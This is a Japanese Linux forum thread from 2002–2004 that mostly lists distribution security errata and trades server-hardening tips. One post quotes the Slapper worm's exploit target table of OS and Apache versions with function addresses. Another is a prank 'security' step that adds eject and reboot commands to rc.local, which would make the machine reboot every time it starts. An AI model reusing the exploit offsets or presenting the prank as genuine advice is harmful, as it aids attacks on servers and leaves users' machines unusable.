08/25 Vine-errata security hole util-linux-2.11n-4vl6.i386.rpm mount-2.11n-4vl6.i386.rpm losetup-2.11n-4vl6.i386.rpm
184 :
login:Penguin :02/08/26 23:12 ID:8KXm86HS
>>181 なるほど。
Red Hat だと glibc に付属の glibc_post_upgrade を実行してたよ。
186 :
login:Penguin :02/09/14 13:13 ID:B9dlUKMe
187 :
4も学割野朗 ◆4GET/.F. :02/09/14 23:20 ID:jwopavyL
188 :
4も学割野朗 ◆4GET/.F. :02/09/14 23:22 ID:jwopavyL
これって、UNIX系OS入れてたってことなのかな? それとも、Win2000?
>>189 ウィンやマックじゃないって書いてあるからUNIX系だと思われ。
>>190 さんくす。
朝日の記事しか読んでなかった。zakuzakuには書いてあったんだね。
おまえらはそもそも軽く考えてサーバ建てすぎ。 まぁこのスレに来る連中はまだいいほうだな。 少なくとも「セキュリティ」という単語を知ってる。
193 :
login:Penguin :02/09/15 00:10 ID:/sdc7+j+
>>192 鯖は建てましたがワールドワイドには繋いでません。
194 :
CRYPTO-GRAM, September 15 :02/09/16 17:43 ID:qCuGZIi/
AES may have been broken. Serpent, too.
195 :
login:Penguin :02/09/17 10:46 ID:FczQ6EGn
>>195 それがまるっきり来ないんだよ。TCP 443 を叩いてもくれない。
既に絶滅したかも。来るのは MS SQL のワームばかり。
最近、https 公開していないサーバに 2 回ほど 443/tcp アクセスがあったよ。まだ Worm は知ら なかったから(゜Д゜)ハァ? と思ったけど。 9/13 17:05:20 と 9/14 19:17:00 に 1 回ずつ SYN が来てた。 1433/tcp に埋もれて見落しそうになる(w
199 :
from bugtraq.c :02/09/17 14:42 ID:f9VI4nxX
オリジナルの Slapper のターゲット。 struct archs { char *os; char *apache; int func_addr; } architectures[] = { {"Gentoo", "", 0x08086c34}, {"Debian", "1.3.26", 0x080863cc}, {"Red-Hat", "1.3.6", 0x080707ec}, {"Red-Hat", "1.3.9", 0x0808ccc4}, {"Red-Hat", "1.3.12", 0x0808f614}, {"Red-Hat", "1.3.12", 0x0809251c}, {"Red-Hat", "1.3.19", 0x0809af8c}, {"Red-Hat", "1.3.20", 0x080994d4}, {"Red-Hat", "1.3.26", 0x08161c14}, {"Red-Hat", "1.3.23", 0x0808528c}, {"Red-Hat", "1.3.22", 0x0808400c}, {"SuSE", "1.3.12", 0x0809f54c}, {"SuSE", "1.3.17", 0x08099984}, {"SuSE", "1.3.19", 0x08099ec8}, {"SuSE", "1.3.20", 0x08099da8}, {"SuSE", "1.3.23", 0x08086168}, {"SuSE", "1.3.23", 0x080861c8}, {"Mandrake", "1.3.14", 0x0809d6c4}, {"Mandrake", "1.3.19", 0x0809ea98}, {"Mandrake", "1.3.20", 0x0809e97c}, {"Mandrake", "1.3.23", 0x08086580}, {"Slackware", "1.3.26", 0x083d37fc}, {"Slackware", "1.3.26",0x080b2100} };
>>198 9/14が最初で毎日2〜3回づつ来てるよ。
201 :
login:Penguin :02/09/17 16:34 ID:f9VI4nxX
>>200 アドレスのスキャン方法によって来る IP と来ない IP があるのかな?
202 :
login:Penguin :02/09/18 19:16 ID:V7u05Yz6
>>201 まず 80 番にアクセスして対象となる Apache を探す。
だから 443 にはアクセスが無い事もある。
GET / HTTP/1.1 してすぐに逃げてく奴が妖しい。
基本的にこないだの Apache のワームの改造版らしいね。
203 :
:02/09/22 02:03 ID:0Va9RvOb
RSAよりも強固な楕円暗号のフリーソースがたしかサンから放出される という噂を聞いたが、それは取り込まれるのかな?
>>203 Linuxに取り込むことは無いだろうが、OpenSSLにはすでに提供済みとのこと。
じきにOpenSSHやGPGなどに取り込まれるじゃないかな?
205 :
名無しさん@Meadow :02/09/22 02:59 ID:v9Q7KCox
>>199 じゃ、ここらへん偽っとくと、昆虫採集できるの?
207 :
login:Penguin :02/09/22 03:09 ID:lAUJfl5L
RedHat7.3を使ってWEBサーバにしています。 セキュリティ対策として ・毎日一回up2date実行 ・IPTABLES ・snort ・tripwire をしています。 ほかに導入すべきソフトや対策あったら教えていただけますでしょうか。
208 :
login:Penguin :02/09/22 15:30 ID:ZMoD+eSk
>>207 ログの監視は必須。これは一番最初にやるべき事だ。
必要ないプログラムを止め、削除する。不用な Apache のモジュールも。
確実に信用できる奴以外はログインさせない、アカウントを作らない。
サーバへのログイン、管理は SSH や SSL 等、盗聴に強いものを使う。
あとはサーバ自身より中味の問題。
CGI 等の Web アプリケーションに注意すべきだ。非常に穴が多い。
どこからか拾って来た CGI スクリプトは決してインストールしない。
クロスサイトスクリプティング脆弱性についても注意が必要だ。
こんなもんだろ。
もっとやりたいパラノイア君には、他にも出来る事が沢山ある。
ピアソンの「Linux セキュリティトータルガイド」一読を薦める。
>>206 絶滅危惧種だから天然ものは簡単には捕まらないぞ。
>>209 なんだ、養殖モノしか捕まらないのか...
(´・ω・)ショボーン
>>211 それって suid root の X クライアントが無いと悪用不可能な気がする。
>>212 xtermはしっかりsuid root。
214 :
login:Penguin :02/10/03 01:04 ID:OsvGBspG
10/03 Vine-errata security hole postgresql-7.2.2-0vl3.i386.rpm postgresql-contrib-7.2.2-0vl3.i386.rpm postgresql-devel-7.2.2-0vl3.i386.rpm postgresql-docs-7.2.2-0vl3.i386.rpm postgresql-jdbc-7.2.2-0vl3.i386.rpm postgresql-libs-7.2.2-0vl3.i386.rpm postgresql-odbc-7.2.2-0vl3.i386.rpm postgresql-perl-7.2.2-0vl3.i386.rpm postgresql-python-7.2.2-0vl3.i386.rpm postgresql-server-7.2.2-0vl3.i386.rpm postgresql-tcl-7.2.2-0vl3.i386.rpm postgresql-tk-7.2.2-0vl3.i386.rpm
215 :
login:Penguin :02/10/03 01:05 ID:OsvGBspG
10/03 Vine-errata security hole namazu-2.0.12-0vl1.i386.rpm namazu-devel-2.0.12-0vl1.i386.rpm
216 :
login:Penguin :02/10/03 01:05 ID:OsvGBspG
10/03 Vine-errata security hole XFree86-4.2.1-0vl4.i386.rpm XFree86-100dpi-fonts-4.2.1-0vl4.i386.rpm XFree86-75dpi-fonts-4.2.1-0vl4.i386.rpm XFree86-Xnest-4.2.1-0vl4.i386.rpm XFree86-Xvfb-4.2.1-0vl4.i386.rpm XFree86-cyrillic-fonts-4.2.1-0vl4.i386.rpm XFree86-devel-4.2.1-0vl4.i386.rpm XFree86-doc-4.2.1-0vl4.i386.rpm XFree86-gl-4.2.1-0vl4.i386.rpm XFree86-gl-devel-4.2.1-0vl4.i386.rpm XFree86-legacy-4.2.1-0vl4.i386.rpm XFree86-libs-4.2.1-0vl4.i386.rpm XFree86-tools-4.2.1-0vl4.i386.rpm XFree86-twm-4.2.1-0vl4.i386.rpm XFree86-xdm-4.2.1-0vl4.i386.rpm XFree86-xf86cfg-4.2.1-0vl4.i386.rpm XFree86-xfs-4.2.1-0vl4.i386.rpm
217 :
login:Penguin :02/10/03 01:05 ID:OsvGBspG
10/03 Vine-errata security hole python-1.5.2-28vl4.i386.rpm python-devel-1.5.2-28vl4.i386.rpm python-docs-1.5.2-28vl4.i386.rpm python-tools-1.5.2-28vl4.i386.rpm tkinter-1.5.2-28vl4.i386.rpm
218 :
login:Penguin :02/10/03 01:06 ID:OsvGBspG
10/03 Vine-errata security hole xchat-1.8.10-0vl1.i386.rpm
219 :
login:Penguin :02/10/03 01:12 ID:T2cHE8PV
220 :
login:Penguin :02/10/06 15:38 ID:kqhyD1Co
221 :
login:Penguin :02/10/09 16:59 ID:GCLBywcm
222 :
login:Penguin :02/10/12 22:59 ID:AS/1mqsd
mainte
セキュリティを強化するために以下の行を /etc/rc.d/rc.localに追加してください eject eject -t eject eject -t eject eject -t eject echo "ご苦労" reboot
224 :
openssh3.5age :02/10/15 03:19 ID:OdSSQrkP
しかし、こうトロイが続くと心配になるな・・・ make前にソース読むしかないのか?
お前ら、アンチウイルスソフトでSophos以外で 個人利用が無料のものはありますか。
あるよ。
227 :
login:Penguin :02/10/22 23:32 ID:v1mpEmk/
228 :
login:Penguin :02/10/23 13:33 ID:9clkFO2S
10/23 Vine-errata security hole webmin-1.000-1vl3.noarch.rpm
>皆様、セキュリティホールは埋めとけよ
ってことは
>>1 生き埋めですか・・・?
231 :
login:Penguin :02/10/27 19:03 ID:DEU6FCX+
10/27 Vine-errata security hole webmin-1.000-1vl5.noarch.rpm
232 :
login:Penguin :02/10/27 19:06 ID:oH46f0cH
「彼女のセキュリティホールがゆるい」が 埋められてしまったのを思い出したよ。。。
233 :
login:Penguin :02/10/31 19:53 ID:tNyCeh9o
10/31 Vine-errata security hole mozilla-1.1-0vl6.i386.rpm mozilla-chat-1.1-0vl6.i386.rpm mozilla-devel-1.1-0vl6.i386.rpm mozilla-dom-inspector-1.1-0vl6.i386.rpm mozilla-js-debugger-1.1-0vl6.i386.rpm mozilla-mail-1.1-0vl6.i386.rpm mozilla-nspr-1.1-0vl6.i386.rpm mozilla-nspr-devel-1.1-0vl6.i386.rpm mozilla-nss-1.1-0vl6.i386.rpm mozilla-nss-devel-1.1-0vl6.i386.rpm mozilla-psm-1.1-0vl6.i386.rpm
234 :
login:Penguin :02/11/01 10:17 ID:oNzk19D1
11/1 Vine-errata security hole 2.5/{i386,ppc,alpha} unzip-5.50-4vl1.i386.rpm unzip-5.50-4vl1.ppc.rpm unzip-5.50-4vl1.alpha.rpm 2.5/{i386,ppc,alpha} 2.6/{i386,ppc,alpha} tar-1.13.25-8vl3.i386.rpm tar-1.13.25-8vl3.ppc.rpm tar-1.13.25-8vl3.alpha.rpm
235 :
login:Penguin :02/11/11 22:18 ID:lWjYmx1J
236 :
login:Penguin :02/11/12 19:35 ID:IbLfzr3s
Vine Linux 2.5/2.6 向け ・2002,11,12 XFree86 のメモリリーク修正、ドライバ更新 [2.6/{i386,ppc}] ・2002,11,12 kernel のバグ修正 [2.6/{i386}] ・2002,11,12 apache, mod_ssl にセキュリティホール [2.5/{i386,ppc,alpha} 2.6/{i386,ppc,alpha}] ・2002,11,12 openssl にセキュリティホール [2.5/{i386,ppc,alpha}] ・2002,11,12 gv にセキュリティホール [2.5/{i386,ppc} 2.6/{i386,ppc}]
237 :
login:Penguin :02/11/14 11:04 ID:hDcsnf62
11/14 Vine-errata security hole WindowMaker-0.80.2-0vl1.i386.rpm WindowMaker-libs-0.80.2-0vl1.i386.rpm WindowMaker-devel-0.80.2-0vl1.i386.rpm (´・ω・`)ショボーン
238 :
login:Penguin :02/11/14 15:43 ID:h0BBp4h4
bind のパッチリリース age
239 :
login:Penguin :02/11/14 17:24 ID:1qJgRtJZ
240 :
login:Penguin :02/11/14 20:45 ID:M1eCryy5
11/14 Vine-errata security hole glibc-2.2.4-14vl12.i386.rpm glibc-common-2.2.4-14vl12.i386.rpm glibc-devel-2.2.4-14vl12.i386.rpm glibc-profile-2.2.4-14vl12.i386.rpm nscd-2.2.4-14vl12.i386.rpm caching-nameserver-7.1-3vl3.noarch.rpm
241 :
login:Penguin :02/11/15 06:01 ID:jZlgoDm5
11/15 Vine-errata security hole bind-8.3.1-0vl2.i386.rpm bind-devel-8.3.1-0vl2.i386.rpm bind-utils-8.3.1-0vl2.i386.rpm
242 :
login:Penguin :02/11/20 01:55 ID:GUhnBobE
243 :
login:Penguin :02/11/20 04:56 ID:9HGeMWU7
>>1-242 OpenBSD 3.2-Stable版をインストールする事で一件落着!!!
--------------------キリトリセン--------------------
>>243 OpenBSD のデフォルトの設定がいくら堅くても、その後の
設定をミスれば、簡単にセキュリティを弱くできるので、盲信じゃ、
やめた方がいいじゃろう。
少なくとも、他のディストリとか BSD や Solaris などの穴は、
見ておくべき。
>盲信じゃ、やめた方がいいじゃろう。 「盲者じゃ」という前置きが無ければね。 まあ、設定ミスるアホは使うなという事だな。 ミスりたくなければ、Win2kでも使ってりゃ良いだろ。
( ´_ゝ`)フーン
D J B を 使 え
248 :
login:Penguin :02/11/23 19:27 ID:5gG5Oc4E
11/23 Vine-errata security hole kernel-2.4.19-0vl26.i386.rpm kernel-2.4.19-0vl26.i586.rpm kernel-2.4.19-0vl26.i686.rpm kernel-BOOT-2.4.19-0vl26.i386.rpm kernel-doc-2.4.19-0vl26.i386.rpm kernel-headers-2.4.19-0vl26.i386.rpm kernel-smp-2.4.19-0vl26.i386.rpm kernel-smp-2.4.19-0vl26.i586.rpm kernel-smp-2.4.19-0vl26.i686.rpm kernel-source-2.4.19-0vl26.i386.rpm
250 :
login:Penguin :02/11/28 01:35 ID:fshFu6y3
11/27 Vine-errata security hole w3m-0.3.2.1-0vl0.26.i386.rpm
251 :
login:Penguin :02/11/30 11:04 ID:VjhBJ/BI
252 :
login:Penguin :02/12/02 10:37 ID:oTqt5iDH
Canna3.6p1 キタ━━━━(゚∀゚)━━━━ッ!! > Canna 3.6p1をリリースしました(2002/12/02)。 > これはセキュリティ修正のみを行ったリリースです。
253 :
login:Penguin :02/12/02 11:53 ID:Zdu7sQxg
12/02 Vine-errata security hole Canna-3.6p1-0vl1.i386.rpm Canna-devel-3.6p1-0vl1.i386.rpm libcanna-3.6p1-0vl1.i386.rpm
>>251 やたらとあちこちのリナスレに書き込まれてるけど、
1 普通の人がセキュリティに関する意識高揚のために貼っている
2 リナ信者が$のアホっぷりをさらずために貼っている
3 何らかの理由によりリナに恨みを抱いている、あるいは
窓でちょっとばかりの知識にしがみついた人が
リナを見下したくて貼っている
どれなんでしょう?
>>243 >>243 デフォールト設定がOpenBSDよりも固いOSは、今ではいくらでもあるぞ。
OpenBSDの登場当初は確かに、デフォールト設定が最もセキュアなOSだった
けど、その思想が広まった今では、どちらかといういうと、デフォールト設定
が甘いOSになっちゃったんじゃないの? いまだにデフォールトでsshdを起動
しておくなんて正気とは思えん (OpenSSH のサーバー側に、ここ2年でいくつ
remote hole が見つかったのやら...)。それとも、OpenBSD の最新版では
sshd やら portmap やらを起動しなくなったの?
> 窓でちょっとばかりの知識にしがみついた人が 誰か、和訳してくれ。
257 :
login:Penguin :02/12/03 00:41 ID:dM/xGgbt
12/03 Vine-errata security fix glibc-2.2.4-14vl13.i386.rpm glibc-common-2.2.4-14vl13.i386.rpm glibc-devel-2.2.4-14vl13.i386.rpm glibc-profile-2.2.4-14vl13.i386.rpm nscd-2.2.4-14vl13.i386.rpm
258 :
255 :02/12/03 11:29 ID:YEO1uHIX
>>256 和訳
窓でソフトウェアのインストールができるようになりました
窓でインターネットの設定ができます
窓パソコンを自作できます
VC++使って開発をやっています
窓で毎日2時間チャットをやってます
Linux?ああ、あのオタ向けのOSですね。(使ったことはない)
Linux?対応する周辺機器、ソフトが少なくて使い物になりませんよ
Linux?インストールだけで苦労して後は使い物にならないダメOSでしょ
な感じかなー?今までの経験からして。
259 :
login:Penguin :02/12/03 11:38 ID:vfqO2k1x
>>256 原文:
窓でちょっとばかりの知識にしがみついた人が
リナを見下したくて貼っている
和訳:
セキュリティ面で色々言われていたWindowsユーザーが、
ここぞとばかりにLinuxを見下したくて貼っている。
(ついでにWindowsは設定が簡単なので、Windowsユーザーは知識が乏しい
と言ってみるテスト)
260 :
255 :02/12/03 11:49 ID:YEO1uHIX
>>259 あぁ、そう言ってしまうと身も蓋もないから避けてたのになぁ。(^_^;)
261 :
254 :02/12/03 11:50 ID:YEO1uHIX
(×)255 (○)254
262 :
sage :02/12/05 00:29 ID:2ZCfTFxe
> Linux?ああ、あのオタ向けのOSですね。(使ったことはない) ま、プロ向けかアマ向けか、ちゅーことですな。 本当のプロは商用Unixでがっぽり稼ぐ、いう話もあるが。
ああ、またやってもた。 俺ってバカ。
BSD:東工,慶応矢上,奈良 Linux:会津
266 :
login:Penguin :02/12/11 03:43 ID:9SlxkTcQ
12/10 Vine-errata security hole w3m-0.3.2.2-0vl0.26.i386.rpm
267 :
login:Penguin :02/12/15 16:56 ID:VmqacBB3
268 :
login:Penguin :02/12/18 02:10 ID:tuH8qVMB
ってか、patch置いてあるし。 しかもバージョン番号age忘れただけという・・・。
おなまえをいちいち考えなくていいからfusianasanっていいよね♪ 最初ね、かぶっちゃったこともあったしでもあいぴーっていうのはかぶらないんだね♪
>>361 平壌放送。N速にウェー、ハッハッハッスレあるから探してみ。
1/8 Debian Security Advisory DSA-224-1 canna -- buffer overflow and more
Debian Security Advisory 1/10 DSA-226 xpdf-i integer overflow 1/9 DSA-225 tomcat4 source disclosure
275 :
山崎渉 :03/01/15 11:44 ID:wo7m90to
(^^)
Debian 1/17] DSA-231 dhcp3 stack overflows 1/16 DSA-230 bugzilla insecure permissions, spurious backup files 1/15 DSA-229 imp SQL injection 1/14 DSA-228 libmcrypt buffer overflows and memory leak 1/13 DSA-227 openldap2 buffer overflows and other bugs
Debian 1/23 DSA-240 kdegames several DSA-239 kdesdk several DSA-238 kdepim several DSA-237 kdenetwork several 1/22 DSA-236 kdelibs several DSA-235 kdegraphics several DSA-234 kdeadmin several 1/21 DSA-233 cvs doubly freed memory 1/20 DSA-232 cupsys several
Debian 1/24 DSA-243 kdemultimedia several DSA-242 kdebase several DSA-241 kdeutils several
Debian 1/31 DSA-248 hypermail buffer overflows 1/30 DSA-247 courier-ssl missing input sanitizing 1/29 DSA-246 tomcat information exposure, cross site scripting 1/28 DSA-245 dhcp3 ignored counter boundary 1/27 DSA-244 noffle buffer overflows
Debian 2/14 DSA-251 w3m missing HTML quoting 2/12 DSA-250 w3mmee-ssl missing HTML quoting 2/11 DSA-249 w3mmee missing HTML quoting
281 :
login:Penguin :03/02/20 19:30 ID:6GOTZljH
Debian 2/24 DSA-253 openssl information leak 2/21 DSA-252 slocate buffer overflow
283 :
login:Penguin :03/03/04 10:45 ID:9DAOHkRs
284 :
login:Penguin :03/03/04 10:46 ID:eH2UwdTM
285 :
bloom :03/03/04 11:44 ID:IbbEqegY
286 :
login:Penguin :03/03/04 11:54 ID:XcJd8/fD
287 :
login:Penguin :03/03/04 22:54 ID:4pdCFVc3
洒落にならんけど、不要に煽る香具師もどうかと :-)
288 :
login:Penguin :03/03/05 13:51 ID:sbwwPHEA
だれが不要に煽ってるんだ? 被害妄想だろ。
290 :
login:Penguin :03/05/27 23:35 ID:qlYLaq9J
291 :
290 :03/05/28 00:53 ID:goQ6Azbn
292 :
山崎渉 :03/05/28 16:40 ID:4u9ffZfO
∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉
293 :
山崎 渉 :03/07/15 11:34 ID:2JhhXBQM
__∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
295 :
login:Penguin :03/08/15 09:32 ID:Fk89fFRa
age
296 :
山崎 渉 :03/08/15 22:16 ID:dil3w4kp
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
297 :
山崎 渉 :03/08/15 22:29 ID:ep0zwfOh
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
298 :
login:Penguin :03/08/19 14:07 ID:678Ux40N
3日前ぐらいから 210.21.34.66 - - [19/Aug/2003:11:20:36 +0900] "GET / HTTP/1.1" 200 3208 "-" "Moz illa/4.0 (compatible; MSIE 5.5; Windows 98)" 61.182.255.188 - - [19/Aug/2003:11:21:30 +0900] "GET / HTTP/1.1" 200 3208 "-" "M ozilla/4.0 (compatible; MSIE 5.5; Windows 98)" みたいなのがすごい頻度(2分おきぐらい)でapache宛にくるんですが、これってどれと関連してるの?
299 :
login:Penguin :03/08/24 19:44 ID:LGNONZ7b
Linuxにセキュリティホールなんてあるわけないだろ M$の糞OSと一緒にすんな
つまらん
301 :
ピーター・ベントン :03/09/24 01:21 ID:juie5mui
302 :
login:Penguin :03/10/01 19:20 ID:Ps8l3gR3
OpenSSLにDoSを引き起こす脆弱性
303 :
login:Penguin :03/10/27 23:34 ID:ERg+VwNs
穴があったら入りたい
304 :
login:Penguin :03/10/28 21:54 ID:obMOUynA
305 :
login:Penguin :03/10/30 08:27 ID:ySJ+EFpp
307 :
ファンファン :03/11/02 20:25 ID:556aM5ia
308 :
login:Penguin :03/11/05 14:42 ID:9kuD0vlS
309 :
login:Penguin :03/11/11 15:14 ID:HsPpywCL
310 :
login:Penguin :03/11/18 21:48 ID:SdQL4FsV
311 :
login:Penguin :03/11/27 01:44 ID:prSLxxQ4
312 :
login:Penguin :03/12/02 21:52 ID:QTZAxPpf
313 :
login:Penguin :03/12/09 18:13 ID:/fLfndsD
314 :
login:Penguin :03/12/16 15:15 ID:mykGXu/A
ethereal 0.9?.?? => 0.10かよ
316 :
login:Penguin :03/12/17 18:49 ID:TkILKMt3
Debian 12/17 DSA-401-1 hylafax -- format strings 12/17 DSA-402-1 minimalist -- unsanitised input
317 :
login:Penguin :03/12/24 16:35 ID:iGk6TAXx
318 :
login:Penguin :03/12/30 14:32 ID:qU3nvfcf
319 :
login:Penguin :03/12/31 16:05 ID:m71Pca6B
12/29 Gentoo: cvs Privilege escalation vulnerability 12/30 Debian: xsok Missing privelige release
320 :
login:Penguin :04/01/01 17:24 ID:WtCAo48K
12/31 Mandrake: proftpd Root access vulnerability
321 :
login:Penguin :04/01/06 16:04 ID:tgdBSY23
1/5/ Suse: kernel Privilege escalation vulnerability 1/5/ Red Hat: kernel Privilege escalation vulnerability 1/5/ Debian: screen Privilege leak vulnerability 1/5/ Debian: lftp Buffer overflow vulnerability 1/5/ Debian: ethereal Denial of service attack
322 :
login:Penguin :04/01/07 14:32 ID:mCNdx8uW
1/6 Debian: kernel Privilege escalation vulnerability 1/6 Turbolinux: kernel Privilege escalation vulnerability 1/6 Debian: nd Buffer overflow vulnerability 1/6 Debian: mpg321 Malformed format string vulnerability 1/6 Debian: libnids Buffer overflow vulnerability 1/6 Debian: BIND Cache poisoning vulnerability 1/6/ Fedora: kernel Privilege escalation vulnerability
323 :
login:Penguin :04/01/08 15:12 ID:MHF0VDdD
1/7 Debian: kernel More for Priv. Esc vulnerability 1/7 Debian: fsp Buffer overflow/Directory traversal vulns. 1/7 Debian: zebra Denial of Service vulnerability 1/7 Debian: jabber Denial of Service vulnerability 1/7 Fedora: etherial Denial of Service vulnerability 1/7 Slackware: kernel Privilege escalation vulnerability
324 :
login:Penguin :04/01/09 00:08 ID:uoDpOTlw
1/8 Debian: vbox3 Privilege leak vulnerability
325 :
login:Penguin :04/01/09 17:56 ID:m1uGuzrs
1/8 Red Hat: etherial Denial of Service vulnerabilities 1/8 Mandrake: kernel Privilege escalation vulnerability
326 :
login:Penguin :04/01/10 14:20 ID:NAw+6fyF
1/9 Debian: kernel Priv. Escal. additional patches 1/9 Debian: phpgroupware Multiple vulnerabilities 1/9 Slackware: kernel Priv. Escal. patch for 8.1 1/9 Gentoo: kernel Privilege escalation vulnerability
327 :
login:Penguin :04/01/13 15:43 ID:34XHBVjP
1/12 Debian: mod-auth-shadow Account expiration not enforced 1/12 Red Hat: cvs Chroot breakout vulnerability 1/12 Debian: jitterbug Improper input sanatizing
328 :
login:Penguin :04/01/14 14:38 ID:rCvtgFmv
1/13 Mandrake: etherial Multiple DoS vulernabilities
329 :
login:Penguin :04/01/15 00:33 ID:3fXHLowM
1/14 Red Hat: kdepim Buffer overflow vulnerability 1/14 Suse: tcpdump Denial of service vulnerability
330 :
login:Penguin :04/01/15 15:22 ID:dMc7vbOt
1/14 Red Hat: tcpdump Denial of service vulnerability
331 :
login:Penguin :04/01/16 01:41 ID:+3ppuQmE
1/15 Mandrake: kdepim Permission leak vulnerability 1/15 Slackware: kdepim Permission leak vulnerability 1/15 Slackware: INN Buffer overflow vulnerability 1/15 Suse: kernel Many vulnerabilities fixed for 64bit 1/15 Debian: kernel-image-2.4.17-ia64 Many backported vuln fixes 1/15 Debian: cvs Multiple vulnerabilities
332 :
login:Penguin :04/01/17 15:54 ID:5S8lxjG3
1/16 Debian: tcpdump Multiple vulnerabilities 1/16 Debian: mc Improper execution vulnerability
333 :
login:Penguin :04/01/20 15:50 ID:mQMVpaJK
1/19 Debian: kernel MIPS version of mremap() fix 1/19 Debian: netpbm-free Insecure temporary files
334 :
login:Penguin :04/01/22 14:45 ID:jmIdE/7G
1/21 Red Hat: mc Buffer overflow vulnerability 1/20 Debian: slocate Heap buffer overflow
335 :
login:Penguin :04/01/23 15:26 ID:7CVecfCu
1/22 Red Hat: slocate Heap overflow vulnerability 1/22 Gentoo: honeyd Honeyd remotely identifiable 1/22 Turbolinux: lftp and tcpdump Multiple vulnerabilities
336 :
login:Penguin :04/01/24 15:57 ID:9X5tQd78
1/23 Mandrake: jabber Denial of service vulnerability 1/23 Mandrake: slocate Heap overflow
337 :
login:Penguin :04/01/27 15:46 ID:hvesCWle
1/26 Debian: gnupg Signing key vulnerability 1/26 Slackware: gaim Multiple vulnerabilities 1/26 Fedora: slocate Heap overflow vulnerability 1/26 Red Hat: gaim Multiple vulnerabilities
338 :
login:Penguin :04/01/27 16:33 ID:YyU14vbY
今しがた、SSHでサーバをいじっていたらなぜか、SSHが切られたので w をしてみるとなぜか、自分以外にSSHで入っているやつが3人いた。 しかもIPとか知らないやつのだし…。とりあえず、SSHを落としておいたけど なぜ??ユーザも一人しか作ってないし、パスワードだってかなり意味不明な 羅列にしているんだが。
なぜって、あーた・・・・
341 :
login:Penguin :04/01/28 12:59 ID:VzrkJnLc
1/27 Fedora: screen Privilege escalation vulnerability 1/27 Gentoo: gaim Multiple vulnerabilities 1/27 Gentoo: mod_python Denial of service vulnerability 1/27 Mandrake: tcpdump Non-sanitized input vulernability 1/27 Mandrake: mc Buffer overflow vulnerability 1/27 Mandrake: gaim Multiple vulnerabilities
342 :
login:Penguin :04/01/29 11:50 ID:qUlrQkgM
1/28 Debian: trr19 Missing privilege release
343 :
login:Penguin :04/01/30 14:33 ID:MB+bTEJk
1/29 Suse: gaim Multiple vulnerabilities
最近、強力なウイルスが時々出回るようになった。 標的は、ほぼ市場を独占状態のOSだが、その度に大騒ぎして多数のPCに対応 ソフトを入れていると、何だかバカバカしくなってくる。影で誰かが儲けて いるんじゃないかと勘ぐりたくさえなる。 とはいえ、SOHOに限らずメールの送受信ができなくなれば死活問題となるわけで、 いつも、何とかするわけだが。最悪、感染したときの対応策は用意しておいた 方がよさそうだ。 そのひとつの方法は、代替OSを用意しておくことかもしれないとこの頃思う。 OSも幾つかあるが、 MACは専用のPCやOSが必要なので割高だ。となると、LINUX系を起動できるよう にしておいて、とにかく急場をしのぐ方法が良さそうに思えるのだが・・ むろん、今後、LINUX系が普及するにつれて、それを標的にするウイルスが出ない とは言えないのだけれど、現時点ではどんなものだろうか。
345 :
login:Penguin :04/02/03 00:27 ID:p/emivL5
2/2 Debian: perl Information leak
346 :
login:Penguin :04/02/03 15:34 ID:4QCHqYoG
2/2 Mandrake: gaim Multiple vulernabilities 2/2 Fedora: cvs Multiple vulnerabilities
347 :
login:Penguin :04/02/04 00:52 ID:B2bpk8Si
2/3 Fedora: etherial Denial of service vulnerability 2/3 Fedora: tcpdump Malformed packet vulnerability 2/3 Red Hat: util-linux Login data leakage 2/3 Red Hat: mc Buffer overflow vulnerability 2/3 Red Hat: NetPBM Temporary file vulnerabilities
348 :
login:Penguin :04/02/04 17:22 ID:2SiWtXLZ
2/3 Red Hat: kernel Multiple vulnerabilities 2/3 Debian: crawl Buffer overflow vulnerability
349 :
login:Penguin :04/02/05 14:41 ID:IYKi/1SV
2/4 Debian: kernel Privilage escalation MIPS patch
350 :
login:Penguin :04/02/07 15:54 ID:HkAvMxBY
2/6 Red Hat: 'netpbm' temporary file vulnerabilities 2/6 Debian: 'mpg123' heap overflow 2/6 Debian: 'gaim' vulnerabilities 2/5 Red Hat: 'mailman' XSS vulnerabilities 2/5 Mandrake: 'glibc' resolver overflow
351 :
login:Penguin :04/02/10 15:52 ID:qHPAEEwe
2/9 Red Hat: gaim Multiple vulnerabilities 2/9 Gentoo: PHP Leaking globals vulnerability 2/9 Debian: mailman Multiple vulnerabilities 2/9 Red Hat: NetPBM Temporary file vulnerabilities
352 :
login:Penguin :04/02/12 15:41 ID:ZifOyE2f
2/11 Red Hat: mutt Denial of service vulnerability 2/11 Gentoo: gallery PHP injection vulnerability 2/11 Gentoo: monkeyd Denial of service vulnerability 2/11 Gentoo: XFree86 Buffer overflow vulnerability
353 :
login:Penguin :04/02/13 00:43 ID:6DEVRcPX
2/12 Mandrake: netpbm Temporary file vulnerabilities 2/12 Mandrake: mutt Denial of service vulnerability 2/12 Debian: cgiemail Open mail relay
354 :
login:Penguin :04/02/14 16:44 ID:mnqazerT
2/13 Slackware: XFree86 Multiple buffer overflows 2/13 Slackware: mutt Buffer overflow vulnerability 2/13 Red Hat: PWLib Denial of service vulnerability 2/13 Red Hat: XFree86 Multiple buffer overflows
355 :
login:Penguin :04/02/18 23:06 ID:U3AQAaGV
ぬう
Linux kernel do_mremap VMA limit local privilege escalation vulnerability
A critical security vulnerability has been found in the Linux kernel
memory management code inside the mremap(2) system call due to missing
function return value check. This bug is completely unrelated to the
mremap bug disclosed on 05-01-2004 except concerning the same internal
kernel function code.
http://www.isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
356 :
login:Penguin :04/04/19 21:18 ID:fav3bE2Z
357 :
login:Penguin :04/05/08 17:40 ID:MyEV46Nv
lhaにセキュリティホールが見つかったらすぃ
359 :
login:Penguin :04/05/10 19:14 ID:LN1iQt2e
作者は放置プレイ気味
360 :
login:Penguin :04/05/16 23:40 ID:ijfOJj2d
元々lhaは日本でしか使われてないだろうし そろそろ使うの止めて欲しいもんだ
DOOMがLHAで圧縮されていたのを思い出した
362 :
